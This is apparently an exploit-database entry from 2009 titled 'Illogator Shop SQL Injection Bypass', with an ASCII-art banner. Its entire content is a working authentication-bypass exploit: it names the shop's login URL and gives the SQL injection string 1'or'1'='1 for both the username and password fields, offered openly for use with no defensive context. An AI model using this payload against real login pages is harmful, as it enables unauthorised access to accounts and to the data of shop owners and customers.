id: 10192
date: 12/11/2009
title: Illogator Shop SQL Injection Bypass
author: bi0
cves: 

===================================
Illogator Shop SQL Injection Bypass
===================================

# Title: Illogator Shop SQL Injection Bypass
# Date: 11/12/2009
# Author: bi0
# CVE : ()
                ______     __     ______
               /\  == \   /\ \   /\  __ \
               \ \  __<   \ \ \  \ \ \/\ \
                \ \_____\  \ \_\  \ \_____\
                 \/_____/   \/_/   \/_____/
 
 
[#]----------------------------------------------------------------[#]
#
# [x] Illogator Shop SQL Injection Bypass
#
[#]----------------------------------------------------------------[#]
#
# [x] Exploit :
#
#    http://example.com/index.php?section=login
#
#    user : 1'or'1'='1
#    pass : 1'or'1'='1
#
[#]----------------------------------------------------------------[#]



#  0day.today [2023-03-23]  #